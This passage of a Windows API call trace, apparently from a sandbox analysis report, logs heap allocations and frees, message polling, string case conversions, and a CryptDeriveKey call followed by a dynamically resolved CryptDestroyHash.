Flags=0x0, Size=0x8) returned 0x34a2100 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.349] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.349] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.349] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.349] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.350] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.350] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.350] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.350] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.350] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.350] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.351] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.351] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.351] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0262.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.356] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.357] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.358] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.358] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.358] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.358] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.360] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.361] CryptDestroyHash (hHash=0xaa5920) returned 1 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.362] RtlAllocateHeap 